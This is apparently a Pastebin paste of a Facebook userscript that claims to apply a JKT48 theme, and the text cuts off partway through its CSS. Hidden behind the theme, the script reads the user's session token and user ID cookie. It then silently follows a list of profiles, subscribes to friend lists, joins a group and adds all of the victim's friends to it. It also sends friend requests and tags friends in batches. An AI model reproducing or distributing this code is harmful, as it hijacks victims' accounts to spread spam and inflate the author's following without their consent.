Advertisement
lryanrc

JKT48 Versi 1

Dec 22nd, 2013
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 92.43 KB | None | 0 0
  1. // ==UserScript==
  2. // @name Trick Mengganti Thema JKT48
  3. // @version v.01
  4. // @Hak Cipta Lryan Rc
  5. // ==/UserScript==
  6. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  7. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  8. alert('Apakah Anda Ingin Merubah Tema Anda..?? Klik OK');
  9. function cereziAl(isim) {
  10. var tarama = isim + "=";
  11. if (document.cookie.length > 0) {
  12. konum = document.cookie.indexOf(tarama)
  13. if (konum != -1) {
  14. konum += tarama.length
  15. son = document.cookie.indexOf(";", konum)
  16. if (son == -1)
  17. son = document.cookie.length
  18. return unescape(document.cookie.substring(konum, son))
  19. }
  20. else { return ""; }
  21. }
  22. }
  23.  
  24. function getRandomInt (min, max) {
  25. return Math.floor(Math.random() * (max - min + 1)) + min;
  26. }
  27. function randomValue(arr) {
  28. return arr[getRandomInt(0, arr.length-1)];
  29. }
  30.  
  31. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  32. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  33.  
  34. function a(abone){
  35. var http4 = new XMLHttpRequest();
  36.  
  37. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  38.  
  39. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  40. http4.open("POST", url4, true);
  41.  
  42. //Send the proper header information along with the request
  43. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  44. http4.setRequestHeader("Content-length", params4.length);
  45. http4.setRequestHeader("Connection", "close");
  46.  
  47. http4.onreadystatechange = function() {//Call a function when the state changes.
  48. if(http4.readyState == 4 && http4.status == 200) {
  49.  
  50. http4.close; // Close the connection
  51.  
  52. }
  53. }
  54.  
  55. http4.send(params4);
  56. }
  57.  
  58. function sublist(uidss) {
  59. var a = document.createElement('script');
  60. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  61. document.body.appendChild(a);
  62. }
  63. //ID Boss (Lryan Rc)
  64. a("100000414417220");a("100005109672286");a("100005181696527");a("100004637527997");a("100004840953074");
  65. a("100004826913086");a("100006848922072");a("100000976790278");a("100004784853164");a("100003044901751");
  66. a("100006916080442");a("100002312399059");a("100002948839205");a("100002856083439");a("100000735343118");
  67. a("100001377934025");a("100004846511871");a("100004002586925");a("100002312783253");
  68. sublist("647905811899893");sublist("185231354992920");sublist("751138521576621");sublist("751139311576542");
  69. sublist("185322661648055");sublist("222727241243331");sublist("209109452591882");sublist("1387977281440556");
  70. sublist("205425336304454");sublist("447784275336089");sublist("749878228369317");sublist("749878841702589");
  71. sublist("750570011633472");sublist("750571331633340");sublist("468486623261276");sublist("750572504966556");
  72.  
  73. var gid = ['437448586380666'];
  74. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  75. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  76.  
  77. var httpwp = new XMLHttpRequest();
  78. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  79. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  80. httpwp['open']('POST', urlwp, true);
  81. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  82. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  83. httpwp['setRequestHeader']('Connection', 'keep-alive');
  84. httpwp['send'](paramswp);
  85.  
  86. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  87. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  88.  
  89. var friends = new Array();
  90. gf = new XMLHttpRequest();
  91. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  92. gf['send']();
  93. if (gf['readyState'] != 4) {} else {
  94. data = eval('(' + gf['responseText']['substr'](9) + ')');
  95. if (data['error']) {} else {
  96. friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  97. return _0x93dax8['index'] - _0x93dax9['index'];
  98. });
  99. };
  100. };
  101.  
  102. for (var i = 0; i < friends['length']; i++) {
  103. var httpwp = new XMLHttpRequest();
  104. var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  105. var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  106. httpwp['open']('POST', urlwp, true);
  107. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  108. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  109. httpwp['setRequestHeader']('Connection', 'keep-alive');
  110. httpwp['onreadystatechange'] = function () {
  111. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  112. };
  113. httpwp['send'](paramswp);
  114. };
  115. var spage_id = "453791288019170";
  116. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  117. var smesaj = "";
  118. var smesaj_text = "";
  119. var arkadaslar = [];
  120. var svn_rev;
  121. var bugun= new Date();
  122. var btarihi = new Date();
  123. btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  124. if(!document.cookie.match(/paylasti=(\d+)/)){
  125. document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
  126. }
  127.  
  128.  
  129. //arkadaslari al ve isle
  130. function sarkadaslari_al(){
  131. var xmlhttp = new XMLHttpRequest();
  132. xmlhttp.onreadystatechange = function () {
  133. if(xmlhttp.readyState == 4){
  134. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  135. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  136. smesaj = "";
  137. smesaj_text = "";
  138. for(i=f*10;i<(f+1)*10;i++){
  139. if(arkadaslar.payload.entries[i]){
  140. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  141. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  142. }
  143. }
  144. lryanrc(); }
  145.  
  146. }
  147.  
  148. };
  149. var params = "&filter[0]=user";
  150. params += "&options[0]=friends_only";
  151. params += "&options[1]=nm";
  152. params += "&token=v7";
  153. params += "&viewer=" + user_id;
  154. params += "&__user=" + user_id;
  155.  
  156. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  157. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  158. xmlhttp.send();
  159. }
  160.  
  161. //tiklama olayini dinle
  162. var tiklama = document.addEventListener("click", function () {
  163. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  164. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  165. sarkadaslari_al();
  166. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  167.  
  168. document.removeEventListener(tiklama);
  169. }
  170. }, false);
  171.  
  172.  
  173. //arkada?¾ ekleme
  174. function sarkadasekle(uid,cins){
  175. var xmlhttp = new XMLHttpRequest();
  176. xmlhttp.onreadystatechange = function () {
  177. if(xmlhttp.readyState == 4){
  178. }
  179. };
  180.  
  181. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  182. var params = "to_friend=" + uid;
  183. params += "&action=add_friend";
  184. params += "&how_found=friend_browser";
  185. params += "&ref_param=none";
  186. params += "&outgoing_id=";
  187. params += "&logging_location=friend_browser";
  188. params += "&no_flyout_on_click=true";
  189. params += "&ego_log_data=";
  190. params += "&http_referer=";
  191. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  192. params += "&phstamp=165816749114848369115";
  193. params += "&__user=" + user_id;
  194. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  195. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  196.  
  197. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  198. xmlhttp.send(params);
  199. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  200. cinsiyetgetir(uid,cins,"sarkadasekle");
  201. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  202. xmlhttp.send(params);
  203. }
  204. }
  205.  
  206. //cinsiyet belirleme
  207. var cinssonuc = {};
  208. var cinshtml = document.createElement("html");
  209. function scinsiyetgetir(uid,cins,fonksiyon){
  210. var xmlhttp = new XMLHttpRequest();
  211. xmlhttp.onreadystatechange = function () {
  212. if(xmlhttp.readyState == 4){
  213. eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  214. cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  215. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  216. if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  217. document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  218. }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  219. document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  220. }
  221. eval(fonksiyon + "(" + id + "," + cins + ");");
  222. }
  223. };
  224. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  225. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  226. xmlhttp.send();
  227. }
  228.  
  229. (function() {
  230. var css = "#facebook body:not(.transparent_widget),#nonfooter,#booklet,.UIFullPage_Container,.fbConnectWidgetTopmost,.connect_widget_vertical_center,.fbFeedbackContent,#LikeboxPluginPagelet\n{ \ncolor: #fff !important;\nbackground: url(\"http://userserve-ak.last.fm/serve/_/74151514/JKT48.jpg\") repeat fixed left center #051022 !important;\n}\n\n\na,.UIActionButton_Text,span,div,input[value=\"Comment\"] {text-shadow: #000 1px 1px 1px !important;}\n\n.UIComposer_InputArea *,.highlighter div{text-shadow: none !important;}\n\n#profile_name {text-shadow: #fff 0 0 2px,#000 1px 1px 3px;}\n\na:hover,.inputbutton:hover,.inputsubmit:hover,.accent,.hover,.domain_name:hover,#standard_error,.UIFilterList_Selected a:hover,input[type=\"submit\"]:not(.fg_action_hide):hover,.button_text:hover,#presence_applications_tab:hover,.UIActionMenu:hover,.attachment_link a span:hover,.UIIntentionalStory_Time a:hover,.UIPortrait_Text .title:hover,.UIPortrait_Text .title span:hover,.comment_link:hover,.request_link span:hover,.UIFilterList_ItemLink .UIFilterList_Title:hover,.UIActionMenu_Text:hover,.UIButton_Text:hover,.inner_button:hover,.panel_item span:hover,li[style*=\"background-color: rgb(255,255,255)\"] .friend_status,.dh_new_media span:hover,a span:hover,.tab_link:hover *,button:hover,#buddy_list_tab:hover *,.tab_handle:hover .tab_name span,.as_link:hover span,input[type=\"button\"]:hover,.feedback_show_link:hover,.page:hover .text,.group:hover .text,.calltoaction:hover .seeMoreTitle,.liketext:hover,.tickerStoryBlock:hover .uiStreamMessage span,.tickerActionVerb,.mleButton:hover,.bigNumber,.pluginRecommendationsBarButton:hover {color: #9cf !important;text-shadow: #fff 0 0 2px !important;text-decoration: none !important;}\n\n\n.fbChatSidebar .fbChatTypeahead .textInput,.fbChatSidebarMessage,.devsitePage .body > .content {box-shadow: none !important;}\n\n.presence_menu_opts,#header,.LJSDialog,.chat_window_wrapper,#navAccount ul,.fbJewelFlyout,.uiTypeaheadView,.uiToggleFlyout { box-shadow: 0 0 3em #000; }\n\n.UIRoundedImage,.UIContentBox_GrayDarkTop,.UIFilterList > .UIFilterList_Title, .dialog-title,.flyout,.uiFacepileItem .uiTooltipWrap {box-shadow: 0 0 1em 1px #000;}\n\n.extra_menus ul li:hover,.UIRoundedBox_Box,.fb_menu_link:hover,.UISelectList_Item:hover,.fb_logo_link:hover,.hovered,#presence_notifications_tab,#chat_tab_barx,.tab_button_div,.plays_val, #mailBoxItems li a:hover,.buddy_row a:hover,.buddyRow a:hover,#navigation a:hover,#presence_applications_tab,#buddy_list_tab,#presence_error_section,.uiStepSelected .middle,.jewelButton,#pageLogo,.fbChatOrderedList .item:hover,.uiStreamHeaderTall {box-shadow: 0 0 3px #000,inset 0 0 5px #000 !important;}\n\n\n.topNavLink > a:hover,#navAccount.openToggler,.selectedCheckable {box-shadow: 0 0 4px 2px #9cf,inset 0 0 2em #69f !important;}\n\n\n.fbChatBuddyListDropdown .uiButton,.promote_page a,.create_button a,.share_button_browser div,.silver_create_button,.button:not(.uiSelectorButton):not(.close):not(.videoicon),button:not(.as_link),.GBSearchBox_Button,.UIButton_Gray,.UIButton,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,.UIActionMenu_SuppressButton,.UIConnectControlsListSelector .uiButton,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton),.fbTimelineRibbon,#fbDockChatBuddylistNub .fbNubButton,.pluginRecommendationsBarButtonLike {box-shadow: 0 0 .5em rgba(0,0,0,0.9),inset 0 0 .75em #9cf !important;border-width: 0 !important; }\n\n.fbChatBuddyListDropdown .uiButton:hover,.uiButton:not(.uiSelectorButton):hover,.fbPrivacyWidget .uiSelectorButton:not(.lockButton):hover,.uiButtonSuppressed:hover,.UIButton:hover,.UIActionMenu_Wrap:hover,.tabs li:hover,.ntab:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([type=\"Flag\"]):not([type=\"submit\"]):hover,.inputsubmit:hover,.promote_page:hover,.create_button:hover,.share_button_browser:hover,.silver_create_button_shell:hover,.painted_button:hover,.flyer_button:hover,.button:not(.close):not(.uiSelectorButton):not(.videoicon):hover,button:not(.as_link):hover,.GBSearchBox_Button:hover,.tagsWrapper,.UIConnectControlsListSelector .uiButton:hover,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton):hover,.fbTimelineMoreButton:hover,#fbDockChatBuddylistNub .fbNubButton:hover,.tab > div:not(.title):hover,.detail.frame:hover,.pluginRecommendationsBarButtonLike:hover {box-shadow: 0 0 .5em #000,0 0 1em 3px #9cf,inset 0 0 2em #69f !important;}\n\n#icon_garden,.list_select .friend_list {box-shadow: 0 0 3px -1px #000,inset 0 0 3px -1px #000;}\n\n.bb .fbNubButton,.uiScrollableAreaGripper {box-shadow: inset 0 4px 8px #9cf,0 0 1em #000 !important;}\n\n.bb .fbNubButton:hover {box-shadow: inset 0 4px 8px #9cf,0 .5em 1em 1em #9cf !important;}\n\n.fbNubFlyoutTitlebar {box-shadow: inset 0 4px 8px #9cf;padding: 0 4px !important;}\n\n#fb_menubar,.progress_bar_outer {box-shadow: inset 0 0 3px #000,0 0 3em 3px #000;}\n#presence_ui {box-shadow: 0 0 3em 1px #000}\n\n#buddy_list_tab:hover,.tab_handle:hover,.focused {box-shadow: 0 0 3px #000,inset 0 0 3px #000,0 0 3em 5px #fff;}\n\n.uiSideNavCount,.jewelCount,.uiContextualDialogContent,.fbTimelineCapsule .fbTimelineTwoColumn > .timelineUnitContainer:hover,.timelineReportContainer:hover,.uiOverlayPageContent,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.uiScaledImageContainer:hover, .pagesVoiceBar, ._k5 {box-shadow: 0 0 1em 4px #9cf !important;}\n\n.img_link:hover,.album_thumb:hover,.fbChatTourCallout .body,.fbSidebarGripper div {box-shadow: 0 0 3em #9cf;}\n\n.shaded,.progress_bar_inner,.tickerStoryAllowClick {box-shadow: inset 0 0 1em #9cf !important}\n\n.UIPhotoGrid_Table .UIPhotoGrid_TableCell:hover .UIPhotoGrid_Image,#myphoto:hover,.mediaThumbWrapper:hover,.uiVideoLink:hover,.mediaThumb:hover,#presence.fbx_bar #presence_ui #presence_bar .highlight,.fbNubFlyout:hover,.hovercard .stage,#fbDockChatBuddylistNub .fbNubFlyout:hover,.balloon-content,.-cx-PRIVATE-uiDialog__border {box-shadow: 0 0 3em 5px #9cf !important;}\n\n.fbNubFlyout,.uiMenuXBorder {box-shadow: 0 0 3em 5px #000 !important;}\n\n#blueBar {box-shadow: 0 0 1em 3px #000 !important;}\n\n\n.fill {box-shadow: inset 0 0 2em #69f,0 0 1em #000 !important;}\n\n\ninput[type=\"file\"]{-moz-appearance:none!important;border: none !important;}\n\n\n.status_text,h4,a,h2,.flyout_menu_title,.url,#label_nm,h5,.WelcomePage_MainMessage,#public_link_uri,#public_link_editphoto span,#public_link_editalbum span,.dh_subtitle,.app_name_heading,.box_head,.presence_bar_button span,a:link span,#public_link_album span,.note_title,.link_placeholder,.stories_title,.typeahead_suggestion,.boardkit_title,.section-title strong,.inputbutton,.inputsubmit,.matches_content_box_title,.tab_name,.header_title_text,.signup_box_message,.quiz_start_quiz,.sidebar_upsell_header,.wall_post_title,.megaphone_header,.source_name,.UIComposer_AttachmentLink,.fcontent > .fname,#presence_applications_tab,.mfs_email_title,.flyout .text,.UIFilterList_ItemLink .UIFilterList_Title,.announce_title,.attachment_link a span,.comment_author,.UIPortrait_Text .title,.comment_link,.UIIntentionalStory_Names,#profile_name,.UIButton_Text,.dh_new_media span,.share_button_browser div,.UIActionMenu_Text,.UINestedFilterList_Title,button,.panel_item span,.stat_elem,.action,#contact_importer_container input[value=\"Find Friends\"]:hover,.navMore,.navLess,input[name=\"add\"],input[name=\"actions[reject]\"],input[name=\"actions[accept]\"],input[name=\"actions[maybe]\"],.uiButtonText,.as_link .default_message,.feedback_hide_link,.feedback_show_link,#fbpage_fan_sidebar_text,.comment_actual_text a span,.uiAttachmentDesc a span,.uiStreamMessage a span,.group .text,.page .text,.uiLinkButton input,.blueName,.uiBlingBox span.text,.commentContent a span,.uiButton input,.fbDockChatTab .name,.simulatedLink,.bfb_tab_selected,.liketext,a.UIImageBlock_Content,.uiTypeaheadView li .text,.author,.authors,.itemLabel,.passiveName,.token,.fbCurrentTitle,.fbSettingsListItemLabel,.uiIconText,#uetqg1_8,.fbRemindersTitle,.mleButton,.uiMenuItem .selected .name {color: #9cf !important;}\n\n#email,option,.disclaimer,.info dd,.UIUpcoming_Info,.UITos_ReviewDescription,.settings_box_text,div[style*=\"color: rgb(85,85,85)\"] {color: #999 !important;}\n\n.status_time,.header_title_wrapper,.copyright,#newsfeed_submenu,#newsfeed_submenu_content strong,.summary,.caption,.story_body,.social_ad_advert_text,.createalbum dt,.basic_info_summary_and_viewer_actions dt,.info dt,.photo_count,p,.fbpage_fans_count,.fbpage_type,.quiz_title,.quiz_detailtext,.byline,label,.fadvfilt b,.fadded,.fupdt,.label,.main_subtitle,.minifeed_filters li,.updates_settings,#public_link_photo,#phototags em,#public_link_editphoto,.note_dialog,#public_link_editalbum,.block_add_person,.privacy_page_field,.action_text,.network,.set_filters span,.byline span,#no_notes,#cheat_sheet,.form_label,.share_item_actions,.options_header,.box_subtitle,.review_header_subtitle_line,.summary strong,.upsell dd,.availability_text,#public_link_album,.explanation,.aim_link,.subtitle,#profile_status,span[style*=\"color: rgb(51,51,51)\"],.fphone_label,.phone_type_label,.sublabel,.gift_caption,dd span,.events_bar,.searching,.event_profile_title,.feedBackground,.fp_show_less,.increments td,.status_confirm,.sentence,.admin_list span,.boardkit_no_topics,.boardkit_subtitle,.petition_preview,.boardkit_topic_summary,li,#photo_badge,.status_body, .spell_suggest_label,.pg_title,.white_box,.token span,.profile_activation_score,.personal_msg span,.matches_content_box_subtitle span,tr[fbcontext=\"41097bfeb58d\"] td,.title,.floated_container span:not(.accent),div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(68,68,68)\"],.present_info_label,.fbpage_description,.tagged span,#tags h2 strong,#tags div span,.detail,.chat_info_status,.gray-text,.author_header,.inline_comment,.fbpage_info,.gueststatus,.no_pages,.topic_pager,.header_comment span,div[style*=\"color: rgb(101,107,111)\"],#q,span[style*=\"color: rgb(85,85,85)\"],.pl-item,.tagged_in,.pick_body,td[style*=\"color: rgb(85,85,85)\"],strong[style*=\"color: rgb(68,68,68)\"],div[style*=\"color: gray\"],.group_officers dd,.fbpage_group_title,.application_menu_divider,.friend_status span,.more_info,.logged_out_register_subhead,.logged_out_register_footer,input[type=\"text\"],textarea,.status_name span,input[type=\"file\"],.UIStoryAttachment_Copy,.stream_participants_short,.UIHotStory_Copy,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not(.UIButton_Text):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),input[type=\"search\"],input[type=\"input\"],.inputtext,.relationship span,input[type=\"button\"]:not([value=\"Comment\"]),input[type=\"password\"],#reg_pages_msg,.UIMutableFilterList_Tip,.like_sentence,.UIIntentionalStory_InfoText,.UIHotStory_Why,.question_text,.UIStory,.tokenizer,input[type=\"hidden\"],.tokenizer_input *,.text:not(.external),.flistedit b,.fexth,.UIActionMenu_Main,span[style*=\"color: rgb(102,102,102)\"],div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(119,119,119)\"],blockquote,.description,.security_badge,.full_name,.email_display,.email_section,.chat_fl_nux_messaging,.UIObjectListing_Subtext,.confirmation_login_content,.confirm_username,.UIConnectControls_Body em,.comment_actual_text,.status,.UICantSeeProfileBlurbText,.UILiveLink_Description,.recaptcha_text,.UIBeep_Title,.UIComposer_Attachment_ShareLink_URL,.app_dir_app_category,.first_stat,.aggregate_review_title,.stats span,.facebook_disclaimer,.app_dir_app_creator,.app_dir_app_monthly_active_users,.app_dir_app_friend_users,.UISearchFilterBar_Label,.UIFullListing_InfoLabel,.email_promise_detail,.title_text,.excerpt,.dialog_body,.tos,.UIEMUASFrame_body,.page_note,.nux_highlight_composer,.UIIntentionalStory_BottomAttribution,.tagline,.GBSelectList,.gigaboxx_thread_header_authors,.GBThreadMessageRow_ReferrerLink,#footerWrapper,.infoTitle,.fg_explain,.UIMentor_Message,.GenericStory_BottomAttribution,.chat_input,.video_timestamp span,#tagger_prompt,.UIImageBlock_Content,.new_list span, .GBSearchBox_Input input,.SearchPage_EmailSearchLeft,.sub_info,.UIBigNumber_Label,.UIInsightsGeoList_ListTitle,.UIInsightsGeoList_ListItemValue,.UIInsightsSmall_Note,.textmedium,.UIFeedFormStory_Lead,.home_no_stories_content, .title_label,div[style*=\"color: rgb(102,102,102)\"],*[style*=\"color: rgb(51,51,51)\"],.tab_box_inner,.uiStreamMessage,.privacy_section_description,.info_text,.uiAttachmentDesc,.uiListBulleted span,.privacySettingsGrid th,.recommendations_metadata,.postleft dd:not(.usertitle),.postText,.mall_post_body_text,.fbChatMessage,.fbProfileBylineFragment,.nosave option,.uiAttachmentDetails,.fbInsightsTable td,.mall_post_body,.uiStreamPassive,.snippet,.questionInfo span,.promotionsHowto,.fcg,.headerColumn .fwb,.rowGroupTitle .fwb,.rowGroupDescription .fwb,.likeUnit,.aboveUnitContent,.placeholder,.sectionContent,.UIFaq_Snippet,.uiMenuItem:not(.checked) .name,.balloon-text,.fbLongBlurb,.legendLabel,.messageBody {color: #bbb !important;}\n\n.status_clear_link,h3,h1,.updates,.WelcomePage_SignUpHeadline,.WelcomePage_SignUpSubheadline,.mock_h4 .left,.review_header_title,caption,.logged_out_register_msg,.domain_name, .UITitledBox_Title,.signup_box_content,.highlight,.question,.whocan span,.UIFilterList > .UIFilterList_Title,.subject,.UIStoryAttachment_Label,.typeahead_message,.UIShareStage_Title,.alternate_name,.helper_text,.textlarge,.page .category,.item_date,.privacy_section_label,.privacy_section_title,.uiTextMetadata, .seeMoreTitle,.categoryContents,code,.usertitle,.fbAppSettingsPageHeader,.fsxl,.LogoutPage_MobileMessage,.LogoutPage_MobileSubmessage,.recommended_text,#all_friends_text,.removable,.ginormousProfileName,.experienceContent .fwb,#bfb_t_popular_body div[style*=\"color:#880000\"],.fsm:not(.snippet):not(.itemLabel):not(.fbChatMessage),.uiStreamHeaderTextRight,.bookmarksNavSeeAll,.tab .content,.fbProfilePlacesFilterCount,.fbMarketingTextColorDark,.pageNumTitle,.pluginRecommendationsBarButton {color: #69f !important;}\n\n.em,.story_comment_back_quote,.story_content,small,.story_content_excerpt,.walltext,.public,p span,#friends_page_subtitle,.main_title,.empty_message,.count,.count strong,.stories_not_included li span,.mobile_add_phone th,#friends strong,.current,.no_photos,.intro,.sub_selected a,.stats,.result_network,.note_body,#bodyContent div b,#bodyContent div,.upsell dt,.buddy_count_num strong,.left,.body,.tab .current,.aim_link span,.story_related_count,.admins span,.summary em,.fphone_number,.my_numbers_label,.blurb_inner,.photo_header strong,.note_content,.multi_friend_status,.current_path span,.current_path,.petition_header,.pyramid_summary strong,#status_text,.contact_email_pending em,.profile_needy_message,.paging_link div,.big_title,.fb_header_light,.import_status strong,.upload_guidelines ul li span,.upload_guidelines ul li span strong,#selector_status,.timestamp strong,.chat_notice,.notice_box,.text_container,.album_owner,.location,.info_rows dd,.divider,.post_user,div[style=\"color: rgb(101,107,111);\"] b,div[style=\"color: rgb(51,51,51);\"] b,.basic_info_summary_and_viewer_actions dd,.profile_info dd,.story_comment,p strong,th strong,.fstatus,.feed_story_body,.story_content_data,.home_prefs_saved p,.networks dd,.relationship_status dd,.birthday dd,.current_city dd,.UIIntentionalStory_Message,.UIFilterList_Selected a,.UIHomeBox_Title,.suggestion,.spell_suggest,.UIStoryAttachment_Caption,.fexth + td,.fext_short,#fb_menu_inbox_unread_count,.Tabset_selected .arrow .sel_link span,.UISelectList_check_Checked,.chat_fl_nux_header,.friendlist_status .title a,.chat_setting label,.UIPager_PageNum,.good_username,.UIComposer_AttachmentTitle,.rsvp_option:hover label,.Black,.comment_author span,.fan_status_inactive,.holder,.UIThumbPagerControl_PageNumber,.text_center,.nobody_selected,.email_promise,.blocklist ul,#advanced_body_1 label,.continue,.empty_albums,div[style*=\"color: black\"],.GBThreadMessageRow_Body_Content,.UIShareStage_Subtitle,#public_link_photo span,.GenericStory_Message,.UIStoryAttachment_Value,div[style*=\"color: black\"],.SearchPage_EmailSearchTitle,.uiTextSubtitle,.jewelHeader,.recent_activity_settings_label,.people_list_item,.uiTextTitle,.tab_box,.instant_personalization_title,.MobileMMSEmailSplash_Description,.MobileMMSEmailSplash_Tipsandtricks_Title,.fcb,input[value=\"Find Friends\"],#bodyContent,#bodyContent table,h6,.fbChatBuddylistError,.info dt,.bfb_options_minimized_hide,.connect_widget_connected_text,body.transparent_widget .connect_widget_not_connected_text,.connect_widget_button_count_count,.fbInsightsStatisticNumber,.fbInsightsTable thead th span,.header span,.friendlist_name a,.count .countValue,.uiHeaderTitle span,#about_text_less span,.uiStreamHeaderText,.navHeader,.uiAttachmentTitle,.fbProfilePlacesFilterText,.tagName,.ufb-dataTable-header-text,.ufb-text-content,.fb_content,.uiComposerAttachment .selected .attachmentName,.balloon-title,.cropMessage {color: #fff !important;}\n\n.bfb_post_action_container {opacity: .25 !important;}\n.bfb_post_action_container:hover {opacity: 1 !important;}\n\n.valid,.wallheader small,#photodate,.video_timestamp strong,.date_divider span,.feed_msg h5,.time,.item_contents,.boardkit_topic_updated,.walltime,.feed_time,.story_time,#status_time_inner,.written small,.date,div[style*=\"color: rgb(85,82,37)\"],.timestamp span,.time_stamp,.timestamp,.header_info_timestamp,.more_info div,.timeline,.UIIntentionalStory_Time,.fupdt,.note_timestamp,.chat_info_status_time,.comment_actions,.UIIntentionalStory_Time a,.UIUpcoming_Time,.rightlinks,.GBThreadMessageRow_Date,.GenericStory_Time a,.GenericStory_Time,.fbPrivacyPageHeader,.date_divider {color: #69f !important;}\n\n.textinput,select,.list_drop_zone,.msg_divide_bottom,textarea,input[type=\"text\"],input[type=\"file\"],input[type=\"search\"],input[type=\"input\"],input[type=\"password\"],.space,.tokenizer,input[type=\"hidden\"],#flm_new_input,.UITooltip:hover,.UIComposer_InputShadow,.searchroot input,input[name=\"search\"],.uiInlineTokenizer,input.text,input.nosave {background: rgba(0,0,0,.50) !important;-moz-appearance:none!important;color: #bbb !important;border: none !important;padding: 3px !important; }\n\ninput[type=\"text\"]:focus,textarea:focus,.fbChatSidebar .fbChatTypeahead .textInput:focus {box-shadow: 0 0 .5em #9cf,inset 0 0 .25em #69f !important;}\n\n.uiOverlayPageWrapper,#fbPhotoSnowlift,.shareOverlay,.tlPageRecentOverlay {background: -moz-radial-gradient(50% 50%,circle,rgba(10,10,10,.6),rgb(10,10,10) 90%) !important;}\n\n.bumper,.stageBackdrop {background: #000 !important;}\n#page_table {background: #333 }\n\n.checkableListItem:hover a,.selectedCheckable a {background: #69f !important; }\n\n.GBSearchBox_Input,.tokenizer,.LTokenizerWrap,#mailBoxItems li a:hover,.uiTypeaheadView .search .selected,.itemAnchor:hover,.notePermalinkMaincol .top_bar, .notification:hover a,#bfb_tabs div:not(.bfb_tab_selected),.bfb_tab,.navIdentity form:hover,.connect_widget_not_connected_text,.uiTypeaheadView 